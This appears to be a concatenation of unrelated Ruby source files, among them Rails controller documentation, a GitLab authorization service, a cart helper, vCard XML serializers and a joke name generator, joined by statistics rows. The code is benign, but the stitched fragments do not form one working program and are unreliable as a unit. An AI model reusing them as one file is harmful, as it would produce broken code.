# Actions, by default, render a template in the <tt>app/views</tt> directory corresponding to the name of the controller and action
# after executing code in the action. For example, the +index+ action of the PostsController would render the
# template <tt>app/views/posts/index.html.erb</tt> by default after populating the <tt>@posts</tt> instance variable.
#
# Unlike index, the create action will not render a template. After performing its main purpose (creating a
# new post), it initiates a redirect instead. This redirect works by returning an external
# <tt>302 Moved</tt> HTTP response that takes the user to the index action.
#
# These two methods represent the two basic action archetypes used in Action Controllers: Get-and-show and do-and-redirect.
# Most actions are variations on these themes.
#
# == Requests
#
# For every request, the router determines the value of the +controller+ and +action+ keys. These determine which controller
# and action are called. The remaining request parameters, the session (if one is available), and the full request with
# all the HTTP headers are made available to the action through accessor methods. Then the action is performed.
#
# The full request object is available via the request accessor and is primarily used to query for HTTP headers:
#
# def server_ip
# location = request.env["REMOTE_ADDR"]
# render plain: "This server hosted at #{location}"
# end
#
# == Parameters
#
# All request parameters, whether they come from a query string in the URL or form data submitted through a POST request are
# available through the <tt>params</tt> method which returns a hash. For example, an action that was performed through
# <tt>/posts?category=All&limit=5</tt> will include <tt>{ "category" => "All", "limit" => "5" }</tt> in <tt>params</tt>.
#
# It's also possible to construct multi-dimensional parameter hashes by specifying keys using brackets, such as:
#
# <input type="text" name="post[name]" value="david">
# <input type="text" name="post[address]" value="hyacintvej">
#
# A request coming from a form holding these inputs will include <tt>{ "post" => { "name" => "david", "address" => "hyacintvej" } }</tt>.
# If the address input had been named <tt>post[address][street]</tt>, the <tt>params</tt> would have included
# <tt>{ "post" => { "address" => { "street" => "hyacintvej" } } }</tt>. There's no limit to the depth of the nesting.
#
# == Sessions
#
# Sessions allow you to store objects in between requests. This is useful for objects that are not yet ready to be persisted,
# such as a Signup object constructed in a multi-paged process, or objects that don't change much and are needed all the time, such
# as a User object for a system that requires login. The session should not be used, however, as a cache for objects where it's likely
# they could be changed unknowingly. It's usually too much work to keep it all synchronized -- something databases already excel at.
#
# You can place objects in the session by using the <tt>session</tt> method, which accesses a hash:
#
# session[:person] = Person.authenticate(user_name, password)
#
# You can retrieve it again through the same hash:
#
# Hello #{session[:person]}
#
# For removing objects from the session, you can either assign a single key to +nil+:
#
# # removes :person from session
# session[:person] = nil
#
# or you can remove the entire session with +reset_session+.
#
# Sessions are stored by default in a browser cookie that's cryptographically signed, but unencrypted.
# This prevents the user from tampering with the session but also allows them to see its contents.
#
# Do not put secret information in cookie-based sessions!
#
# == Responses
#
# Each action results in a response, which holds the headers and document to be sent to the user's browser. The actual response
# object is generated automatically through the use of renders and redirects and requires no user intervention.
#
# == Renders
#
# Action Controller sends content to the user by using one of five rendering methods. The most versatile and common is the rendering
# of a template. Included in the Action Pack is the Action View, which enables rendering of ERB templates. It's automatically configured.
# The controller passes objects to the view by assigning instance variables:
#
# def show
# @post = Post.find(params[:id])
# end
#
# Which are then automatically available to the view:
#
# Title: <%= @post.title %>
#
# You don't have to rely on the automated rendering. For example, actions that could result in the rendering of different templates
# will use the manual rendering methods:
#
# def search
# @results = Search.find(params[:query])
# case @results.count
# when 0 then render action: "no_results"
# when 1 then render action: "show"
# when 2..10 then render action: "show_many"
# end
# end
#
# Read more about writing ERB and Builder templates in ActionView::Base.
#
# == Redirects
#
# Redirects are used to move from one action to another. For example, after a <tt>create</tt> action, which stores a blog entry to the
# database, we might like to show the user the new entry. Because we're following good DRY principles (Don't Repeat Yourself), we're
# going to reuse (and redirect to) a <tt>show</tt> action that we'll assume has already been created. The code might look like this:
#
# def create
# @entry = Entry.new(params[:entry])
# if @entry.save
# # The entry was saved correctly, redirect to show
# redirect_to action: 'show', id: @entry.id
# else
# # things didn't go so well, do something else
# end
# end
#
# In this case, after saving our new entry to the database, the user is redirected to the <tt>show</tt> method, which is then executed.
# Note that this is an external HTTP-level redirection which will cause the browser to make a second request (a GET to the show action),
# and not some internal re-routing which calls both "create" and then "show" within one request.
#
# Learn more about <tt>redirect_to</tt> and what options you have in ActionController::Redirecting.
#
# == Calling multiple redirects or renders
#
# An action may contain only a single render or a single redirect. Attempting to try to do either again will result in a DoubleRenderError:
#
# def do_something
# redirect_to action: "elsewhere"
# render action: "overthere" # raises DoubleRenderError
# end
#
# If you need to redirect on the condition of something, then be sure to add "and return" to halt execution.
#
# def do_something
# redirect_to(action: "elsewhere") and return if monkeys.nil?
# render action: "overthere" # won't be called if monkeys is nil
# end
#
class Base < Metal
abstract!
    # We document the request and response methods here because, although they
    # are implemented in ActionController::Metal, the type of the returned objects
# is unknown at that level.
##
# :method: request
#
# Returns an ActionDispatch::Request instance that represents the
# current request.
##
# :method: response
#
# Returns an ActionDispatch::Response that represents the current
# response.
# Shortcut helper that returns all the modules included in
# ActionController::Base except the ones passed as arguments:
#
# class MyBaseController < ActionController::Metal
# ActionController::Base.without_modules(:ParamsWrapper, :Streaming).each do |left|
# include left
# end
# end
#
# This gives better control over what you want to exclude and makes it
# easier to create a bare controller class, instead of listing the modules
# required manually.
def self.without_modules(*modules)
modules = modules.map do |m|
m.is_a?(Symbol) ? ActionController.const_get(m) : m
end
MODULES - modules
end
MODULES = [
AbstractController::Rendering,
AbstractController::Translation,
AbstractController::AssetPaths,
Helpers,
UrlFor,
Redirecting,
ActionView::Layouts,
Rendering,
Renderers::All,
ConditionalGet,
EtagWithTemplateDigest,
EtagWithFlash,
Caching,
MimeResponds,
ImplicitRender,
StrongParameters,
ParameterEncoding,
Cookies,
Flash,
FormBuilder,
RequestForgeryProtection,
ContentSecurityPolicy,
ForceSSL,
Streaming,
DataStreaming,
HttpAuthentication::Basic::ControllerMethods,
HttpAuthentication::Digest::ControllerMethods,
HttpAuthentication::Token::ControllerMethods,
DefaultHeaders,
# Before callbacks should also be executed as early as possible, so
# also include them at the bottom.
AbstractController::Callbacks,
# Append rescue at the bottom to wrap as much as possible.
Rescue,
# Add instrumentations hooks at the bottom, to ensure they instrument
# all the methods properly.
Instrumentation,
# Params wrapper should come before instrumentation so they are
# properly showed in logs
ParamsWrapper
]
MODULES.each do |mod|
include mod
end
setup_renderer!
# Define some internal variables that should not be propagated to the view.
PROTECTED_IVARS = AbstractController::Rendering::DEFAULT_PROTECTED_INSTANCE_VARIABLES + %i(
@_params @_response @_request @_config @_url_options @_action_has_layout @_view_context_class
@_view_renderer @_lookup_context @_routes @_view_runtime @_db_runtime @_helper_proxy
)
def _protected_ivars # :nodoc:
PROTECTED_IVARS
end
ActiveSupport.run_load_hooks(:action_controller_base, self)
ActiveSupport.run_load_hooks(:action_controller, self)
end
end
| 41.227941 | 141 | 0.699929 |
1850fa9747df54d5a5bf79959c57fb5b89454db5 | 3,766 | # frozen_string_literal: true
module Users
# Service for refreshing the authorized projects of a user.
#
# This particular service class can not be used to update data for the same
# user concurrently. Doing so could lead to an incorrect state. To ensure this
# doesn't happen a caller must synchronize access (e.g. using
# `Gitlab::ExclusiveLease`).
#
# Usage:
#
# user = User.find_by(username: 'alice')
# service = Users::RefreshAuthorizedProjectsService.new(some_user)
# service.execute
class RefreshAuthorizedProjectsService
attr_reader :user, :source
LEASE_TIMEOUT = 1.minute.to_i
# user - The User for which to refresh the authorized projects.
def initialize(user, source: nil, incorrect_auth_found_callback: nil, missing_auth_found_callback: nil)
@user = user
@source = source
@incorrect_auth_found_callback = incorrect_auth_found_callback
@missing_auth_found_callback = missing_auth_found_callback
end
def execute
lease_key = "refresh_authorized_projects:#{user.id}"
lease = Gitlab::ExclusiveLease.new(lease_key, timeout: LEASE_TIMEOUT)
until uuid = lease.try_obtain
# Keep trying until we obtain the lease. If we don't do so we may end up
# not updating the list of authorized projects properly. To prevent
# hammering Redis too much we'll wait for a bit between retries.
sleep(0.1)
end
begin
# We need an up to date User object that has access to all relations that
# may have been created earlier. The only way to ensure this is to reload
# the User object.
user.reset
execute_without_lease
ensure
Gitlab::ExclusiveLease.cancel(lease_key, uuid)
end
end
# This method returns the updated User object.
def execute_without_lease
remove, add = AuthorizedProjectUpdate::FindRecordsDueForRefreshService.new(
user,
source: source,
incorrect_auth_found_callback: incorrect_auth_found_callback,
missing_auth_found_callback: missing_auth_found_callback
).execute
update_authorizations(remove, add)
end
# Updates the list of authorizations for the current user.
#
# remove - The IDs of the authorization rows to remove.
# add - Rows to insert in the form `[user id, project id, access level]`
def update_authorizations(remove = [], add = [])
log_refresh_details(remove, add)
User.transaction do
user.remove_project_authorizations(remove) unless remove.empty?
ProjectAuthorization.insert_authorizations(add) unless add.empty?
end
# Since we batch insert authorization rows, Rails' associations may get
# out of sync. As such we force a reload of the User object.
user.reset
end
private
attr_reader :incorrect_auth_found_callback, :missing_auth_found_callback
def log_refresh_details(remove, add)
Gitlab::AppJsonLogger.info(event: 'authorized_projects_refresh',
user_id: user.id,
'authorized_projects_refresh.source': source,
'authorized_projects_refresh.rows_deleted_count': remove.length,
'authorized_projects_refresh.rows_added_count': add.length,
# most often there's only a few entries in remove and add, but limit it to the first 5
# entries to avoid flooding the logs
'authorized_projects_refresh.rows_deleted_slice': remove.first(5),
'authorized_projects_refresh.rows_added_slice': add.first(5))
end
end
end
| 38.824742 | 119 | 0.669145 |
7a67976b8378124568ca935f24fbb128677651e5 | 2,184 | require "name_change_o_chart/version"
module NameChangeOChart
def convert(name)
parts = name.to_s.downcase.split
start = parts.first.to_s
ending = parts.last.to_s
first = start[0]
second = ending[0]
third = ending[-1]
%{#{first_of_first(first)} #{first_of_last(second)}#{last_of_last(third)}}
end
def first_of_first(letter)
{"a" => "stinky",
"b" => "lumpy",
"c" => "buttercup",
"d" => "gidget",
"e" => "crusty",
"f" => "greasy",
"g" => "fluffy",
"h" => "cheeseball",
"i" => "chim-chim",
"j" => "poopsie",
"k" => "flunky",
"l" => "booger",
"m" => "pinky",
"n" => "zippy",
"o" => "goober",
"p" => "doofus",
"q" => "slimy",
"r" => "loopy",
"s" => "snotty",
"t" => "falafel",
"u" => "dorkey",
"v" => "squeezit",
"w" => "oprah",
"x" => "skipper",
"y" => "dinky",
"z" => "zsa-zsa"}.fetch(letter)
end
def first_of_last(letter)
{"a" => "diaper",
"b" => "toilet",
"c" => "giggle",
"d" => "bubble",
"e" => "girdle",
"f" => "barf",
"g" => "lizard",
"h" => "waffle",
"i" => "cootie",
"j" => "monkey",
"k" => "potty",
"l" => "liver",
"m" => "banana",
"n" => "rhino",
"o" => "burger",
"p" => "hamster",
"q" => "toad",
"r" => "gizzard",
"s" => "pizza",
"t" => "gerbil",
"u" => "chicken",
"v" => "pickle",
"w" => "chuckle",
"x" => "tofu",
"y" => "gorilla",
"z" => "stinker"}.fetch(letter)
end
def last_of_last(letter)
{"a" => "head",
"b" => "mouth",
"c" => "face",
"d" => "nose",
"e" => "tush",
"f" => "breath",
"g" => "pants",
"h" => "shorts",
"i" => "lips",
"j" => "honker",
"k" => "butt",
"l" => "brain",
"m" => "tushie",
"n" => "chunks",
"o" => "hiney",
"p" => "biscuits",
"q" => "toes",
"r" => "buns",
"s" => "fanny",
"t" => "sniffer",
"u" => "sprinkles",
"v" => "kisser",
"w" => "squirt",
"x" => "humperdinck",
"y" => "brains",
"z" => "juice"}.fetch(letter)
end
module_function *self.instance_methods(false)
end
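# Deterministic usage sketch (derived from the lookup tables above):
#
#   NameChangeOChart.convert("Harry Potter") # => "cheeseball hamsterbuns"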
| 20.603774 | 78 | 0.419414 |
39781c7037b681a4cc44599d95d63d85f2dd495b | 245 | FactoryBot.define do
factory :user, class: User do
name { Faker::Name.first_name }
last_name { Faker::Name.last_name }
sex { [Commons::Concerns::Attributes::Sex::FEMALE, Commons::Concerns::Attributes::Sex::MALE].sample }
end
end
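# Usage sketch (assumes FactoryBot's syntax methods are included in specs):
#
#   user = create(:user)
#   user.sex # => Sex::FEMALE or Sex::MALE, picked at random by the factory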
| 30.625 | 105 | 0.697959 |
87449c651f0b3625b51e5e4bbfc75c3b10f8b4cb | 181 | class UserMenu::SignedInComponent < ApplicationComponent
attr_reader :user
def initialize(user)
@user = user
end
def business?
user.business&.persisted?
end
end
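# Render sketch (assumes ApplicationComponent follows ViewComponent conventions):
#
#   <%= render UserMenu::SignedInComponent.new(current_user) %>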
| 15.083333 | 56 | 0.723757 |
e90f0ba730e84fb4da9754b9e7339eb021d4bcb2 | 500 | module ActiveRecord
module ConnectionAdapters
module Sqlserver
module Showplan
class PrinterXml
def initialize(result)
@result = result
end
def pp
xml = @result.rows.first.first
if defined?(Nokogiri)
Nokogiri::XML(xml).to_xml :indent => 2, :encoding => 'UTF-8'
else
xml
end
end
end
end
end
end
end
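# Usage sketch (`result` is assumed to hold a single SHOWPLAN XML cell):
#
#   printer = ActiveRecord::ConnectionAdapters::Sqlserver::Showplan::PrinterXml.new(result)
#   puts printer.pp # pretty-printed only when Nokogiri is available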
| 19.230769 | 74 | 0.464 |
ed9a9c74747540a684a0b14115bfbc5de16e316b | 291 | require 'rails_helper'
RSpec.describe "inflows/edit", type: :view do
before(:each) do
    @inflow = assign(:inflow, Inflow.create!)
end
it "renders the edit inflow form" do
render
assert_select "form[action=?][method=?]", inflow_path(@inflow), "post" do
end
end
end
| 19.4 | 77 | 0.66323 |
79a2466c1d8aa9fc49f746735e919585b8a45248 | 315 | unless defined?(Devise)
require 'devise'
end
module DeviseBearerToken
end
Devise.add_module :bearer_token_authenticatable, model: true, strategy: true
Devise.setup do |config|
config.bearer_token_fields = [ :access_token, :token_type, :client, :expiry, :uid ]
config.bearer_token_strategy = :headers
end
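# Model-side sketch (assumes the matching model module and Warden strategy
# are provided elsewhere by this gem):
#
#   class User < ApplicationRecord
#     devise :database_authenticatable, :bearer_token_authenticatable
#   end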
| 22.5 | 85 | 0.774603 |
b9c01f44d7d6419767575b987368e9e56e281daf | 1,459 | module PiiSafeSchema
class PiiColumn
extend PiiSafeSchema::Annotations
attr_reader :table, :column, :suggestion
def initialize(table:, column:, suggestion:)
@table = table.to_sym
@column = column
@suggestion = suggestion
end
class << self
def all
find_and_create
end
def from_column_name(table:, column:, suggestion:)
activerecord_column = connection.columns(table.to_s).find { |c| c.name == column.to_s }
unless activerecord_column
raise InvalidColumnError, "column \"#{column}\" does not exist for table \"#{table}\""
end
new(table: table, column: activerecord_column, suggestion: suggestion)
end
private
def find_and_create
relevant_tables.map do |table|
connection.columns(table).map do |column|
next if ignored_column?(table, column)
rec = recommended_comment(column)
rec ? new(table: table, column: column, suggestion: rec) : nil
end.compact
end.compact.flatten
end
def connection
ActiveRecord::Base.connection
end
def relevant_tables
connection.tables - PiiSafeSchema.configuration.ignore_tables
end
def ignored_column?(table, column)
PiiSafeSchema.configuration.
ignore_columns[table.to_sym]&.
include?(column.name.to_sym)
end
end
end
end
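# Usage sketch (names are illustrative; `suggestion` is whatever
# recommended_comment returns for a column):
#
#   PiiSafeSchema::PiiColumn.all # scan all non-ignored tables for PII columns
#   PiiSafeSchema::PiiColumn.from_column_name(table: :users, column: :email,
#                                             suggestion: suggestion)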
| 26.053571 | 96 | 0.627142 |
269c4f303f0d6d7eca0677bc7129f04436c05d24 | 3,840 | module EffectiveCartsHelper
# TODO: Consider unique
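  # Returns the signed-in user's cart (merging any anonymous session cart
  # into it), or a session-keyed guest cart; memoized for the request.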
def current_cart(for_user = nil)
@cart ||= (
user = for_user || (current_user rescue nil) # rescue protects me against Devise not being installed
if user.present?
user_cart = Effective::Cart.where(user: user).first_or_create
# Merge session cart into user cart.
if session[:cart].present?
session_cart = Effective::Cart.where(user: nil).where(id: session[:cart]).first
if session_cart
session_cart.cart_items.each { |i| user_cart.add(i.purchasable, quantity: i.quantity, unique: i.unique) }
session_cart.destroy
end
session[:cart] = nil
end
user_cart
elsif session[:cart].present?
Effective::Cart.where(user_id: nil).where(id: session[:cart]).first_or_create
else
cart = Effective::Cart.create!
session[:cart] = cart.id
cart
end
)
end
def link_to_current_cart(opts = {})
options = {
label: 'My Cart',
id: 'current_cart',
rel: :nofollow,
class: 'btn btn-default'
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-current-cart')
link_to (current_cart.size == 0 ? label : "#{label} (#{current_cart.size})"), effective_orders.cart_path, options
end
def link_to_add_to_cart(purchasable, opts = {})
raise 'expecting an acts_as_purchasable object' unless purchasable.kind_of?(ActsAsPurchasable)
options = {
label: 'Add to Cart',
class: 'btn btn-primary',
rel: :nofollow,
data: {
disable_with: 'Adding...'
}
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-add-to-cart')
link_to(label, effective_orders.add_to_cart_path(purchasable_type: purchasable.class.name, purchasable_id: purchasable.id.to_i), options)
end
def link_to_remove_from_cart(cart_item, opts = {})
raise 'expecting an Effective::CartItem object' unless cart_item.kind_of?(Effective::CartItem)
options = {
label: 'Remove',
class: 'btn btn-primary',
rel: :nofollow,
data: {
confirm: 'Are you sure? This cannot be undone!',
disable_with: 'Removing...'
},
method: :delete
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-remove-from-cart')
link_to(label, effective_orders.remove_from_cart_path(cart_item), options)
end
def link_to_empty_cart(opts = {})
options = {
label: 'Empty Cart',
class: 'btn btn-danger',
rel: :nofollow,
data: {
confirm: 'This will clear your entire cart. Are you sure?',
disable_with: 'Emptying...'
},
method: :delete
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-empty-cart')
link_to(label, effective_orders.cart_path, options)
end
def link_to_checkout(opts = {})
options = {
label: 'Checkout',
class: 'btn btn-primary',
rel: :nofollow,
data: {
disable_with: 'Continuing...'
},
}.merge(opts)
order = options.delete(:order)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-checkout')
if order.present?
link_to(label, effective_orders.edit_order_path(order), options)
else
link_to(label, effective_orders.new_order_path, options)
end
end
def render_cart(cart = nil)
cart ||= current_cart
render(partial: 'effective/carts/cart', locals: { cart: cart })
end
def render_purchasables(*purchasables)
render(partial: 'effective/orders/order_items', locals: { order: Effective::Order.new(purchasables) })
end
end
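# View-layer sketch (helpers above; paths assume the effective_orders engine
# is mounted and @product acts_as_purchasable):
#
#   <%= link_to_current_cart %>
#   <%= link_to_add_to_cart(@product, label: 'Buy now') %>
#   <%= render_cart %>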
| 28.656716 | 141 | 0.623438 |
1abce1777fbdc057ac9bddfb9b11e06c4d9528fb | 669 | # frozen_string_literal: true
require "guard/options"
module Guard
module UI
class Logger
class Config < Guard::Options
DEFAULTS = {
progname: "Guard",
level: :info,
template: ":time - :severity - :message",
time_format: "%H:%M:%S",
flush_seconds: 0,
# Other LumberJack device-specific options
# max_size: "5M",
# buffer_size: 0,
# additional_lines: nil,
}.freeze
def initialize(options = {})
super(options, DEFAULTS)
end
def level=(value)
self["level"] = value
end
end
end
end
end
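# Usage sketch (Guard::Options behaves like a hash with indifferent access,
# merging the DEFAULTS above):
#
#   config = Guard::UI::Logger::Config.new(level: :debug)
#   config["template"] # => ":time - :severity - :message"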
| 20.272727 | 52 | 0.523169 |
e2ec663a909af088e61fe462d5ccc596cf333037 | 5,074 | # frozen_string_literal: true
require "simplecov"
SimpleCov.start do
minimum_coverage 100
end
require "with_model"
# This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
config.extend WithModel
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
# # This allows you to limit a spec run to individual examples or groups
# # you care about by tagging them with `:focus` metadata. When nothing
# # is tagged with `:focus`, all examples get run. RSpec also provides
# # aliases for `it`, `describe`, and `context` that include `:focus`
# # metadata: `fit`, `fdescribe` and `fcontext`, respectively.
# config.filter_run_when_matching :focus
#
# # Allows RSpec to persist some state between runs in order to support
# # the `--only-failures` and `--next-failure` CLI options. We recommend
# # you configure your source control system to ignore this file.
# config.example_status_persistence_file_path = "spec/examples.txt"
#
# # Limits the available syntax to the non-monkey patched syntax that is
# # recommended. For more details, see:
# # - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# # - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# # - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
# config.disable_monkey_patching!
#
# # Many RSpec users commonly either run the entire suite or an individual
# # file, and it's useful to allow more verbose output when running an
# # individual spec file.
# if config.files_to_run.one?
# # Use the documentation formatter for detailed output,
# # unless a formatter has already been configured
# # (e.g. via a command-line flag).
# config.default_formatter = "doc"
# end
#
# # Print the 10 slowest examples and example groups at the
# # end of the spec run, to help surface which specs are running
# # particularly slow.
# config.profile_examples = 10
#
# # Run specs in random order to surface order dependencies. If you find an
# # order dependency and want to debug it, you can fix the order by providing
# # the seed, which is printed after each run.
# # --seed 1234
# config.order = :random
#
# # Seed global randomization in this process using the `--seed` CLI option.
# # Setting this allows you to use `--seed` to deterministically reproduce
# # test failures related to randomization by passing the same `--seed` value
# # as the one that triggered the failure.
# Kernel.srand config.seed
end
| 47.867925 | 96 | 0.719354 |
87c309d747a980eb84f867421c27326b4cb13add | 2,046 | # -*- encoding: utf-8 -*-
# stub: decent_exposure 3.0.4 ruby lib
Gem::Specification.new do |s|
s.name = "decent_exposure".freeze
s.version = "3.0.4"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Pavel Pravosud".freeze, "Stephen Caudill".freeze]
s.date = "2021-01-12"
s.description = "\n DecentExposure helps you program to an interface, rather than an\n implementation in your Rails controllers. The fact of the matter is that\n sharing state via instance variables in controllers promotes close coupling\n with views. DecentExposure gives you a declarative manner of exposing an\n interface to the state that controllers contain and thereby decreasing\n coupling and improving your testability and overall design.\n ".freeze
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/hashrocket/decent_exposure".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0".freeze)
s.rubygems_version = "3.2.13".freeze
s.summary = "A helper for creating declarative interfaces in controllers".freeze
s.installed_by_version = "3.2.13" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<activesupport>.freeze, [">= 4.0"])
s.add_development_dependency(%q<railties>.freeze, [">= 4.0"])
s.add_development_dependency(%q<actionmailer>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec-rails>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<standard>.freeze, [">= 0"])
else
s.add_dependency(%q<activesupport>.freeze, [">= 4.0"])
s.add_dependency(%q<railties>.freeze, [">= 4.0"])
s.add_dependency(%q<actionmailer>.freeze, [">= 0"])
s.add_dependency(%q<rspec-rails>.freeze, ["~> 3.0"])
s.add_dependency(%q<standard>.freeze, [">= 0"])
end
end
| 51.15 | 481 | 0.711144 |
111bcb9e7675c9c76942ee594886fb96c563c897 | 751 | cask "dynobase" do
arch = Hardware::CPU.intel? ? "" : "-arm64"
version "1.8.1"
if Hardware::CPU.intel?
sha256 "6140f786e798668d7f63c12db5bafbad47d1be18d76b64a01ae0c857db3459b6"
else
sha256 "78c62b7eac57282d4afc2e7afe6a28213595a6dcb542b96d0f393a4d2a2c60eb"
end
url "https://github.com/Dynobase/dynobase/releases/download/#{version}/Dynobase-#{version}#{arch}.dmg",
verified: "github.com/Dynobase/dynobase/"
name "Dynobase"
desc "GUI Client for DynamoDB"
homepage "https://dynobase.dev/"
livecheck do
url :url
strategy :github_latest
end
app "Dynobase.app"
zap trash: [
"~/Library/Application Support/dynobase",
"~/Library/Saved Application State/com.rwilinski.dynobase.savedState",
]
end
| 25.033333 | 105 | 0.721704 |
4a8f413ad2312dcdba56892b1a249ba0f72cb5be | 3,589 | module Virginity
class BaseField < ContentLine
def params_to_xml!(params, builder)
builder.params(:type => "array") do
params.each do |p|
builder.tag!(p.key, p.value, :type => "string")
end
end
end
def extra_fields_to_xml(fields, builder)
fields.each_pair { |k,v| builder.tag!(k, v) } unless fields.nil?
end
end
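  # NOTE: BaseField is reopened below to add string-based XML serialization;
  # the builder-based helpers above stay available to the field classes.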
class BaseField < ContentLine
def params_to_xml
s = ""
unless params.empty?
s << "<params>"
params.each do |p|
s << xml_element(p.key, p.value)
end
s << "</params>"
end
s
end
# def params_to_xml
# return "" if params.empty?
# "<params>#{params.map {|p| xml_element(p.key, p.value) }.join}</params>"
# end
def value_to_xml
xml_element(@value, @value.strip)
end
def to_xml
s = "<#{name.downcase}>"
s << xml_element("group", group) unless group.nil?
s << params_to_xml
s << value_to_xml
s << "</#{name.downcase}>"
end
end
class Email < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.email(:index => api_id ) do
xml.id api_id, :type => "string"
# params_to_xml!(params, xml)
xml.address address
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Tel < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.telephone(:index => api_id ) do
xml.id api_id, :type => "string"
# params_to_xml!(params, xml)
xml.number number
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Url < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.url(:index => api_id) do
xml.id api_id, :type => "string"
xml.text text
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Adr < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.address(:index => api_id) do
xml.id api_id, :type => "string"
# params_to_xml!(params, xml)
components.each do |component|
xml.tag!(component, send(component))
end
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Org < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.organisation :index => api_id do
xml.id api_id, :type => "string"
xml.name orgname
xml.unit1 unit1
xml.unit2 unit2
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Impp < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.impp(:index => api_id ) do
xml.id api_id, :type => "string"
xml.scheme scheme
xml.address address
xml.value text
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class TextField < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.note(:index => api_id) do
xml.id api_id, :type => "string"
xml.text text
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
end
| 23.611842 | 80 | 0.575648 |
18ed8e42f9c137dd3b039dab1d363abf520f8606 | 9,437 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# Require this file early so that the version constant gets defined before
# requiring "google/cloud". This is because google-cloud-core will load the
# entrypoint (gem name) file, which in turn re-requires this file (hence
# causing a require cycle) unless the version constant is already defined.
require "google/cloud/retail/version"
require "googleauth"
gem "google-cloud-core"
require "google/cloud" unless defined? ::Google::Cloud.new
require "google/cloud/config"
# Set the default configuration
::Google::Cloud.configure.add_config! :retail do |config|
config.add_field! :endpoint, "retail.googleapis.com", match: ::String
config.add_field! :credentials, nil, match: [::String, ::Hash, ::Google::Auth::Credentials]
config.add_field! :scope, nil, match: [::Array, ::String]
config.add_field! :lib_name, nil, match: ::String
config.add_field! :lib_version, nil, match: ::String
config.add_field! :interceptors, nil, match: ::Array
config.add_field! :timeout, nil, match: ::Numeric
config.add_field! :metadata, nil, match: ::Hash
config.add_field! :retry_policy, nil, match: [::Hash, ::Proc]
config.add_field! :quota_project, nil, match: ::String
end
module Google
module Cloud
module Retail
##
# Create a new client object for CatalogService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::CatalogService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/CatalogService/Client.html)
# for version V2 of the API.
      # However, you can specify a different API version by passing it in the
# `version` parameter. If the CatalogService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About CatalogService
#
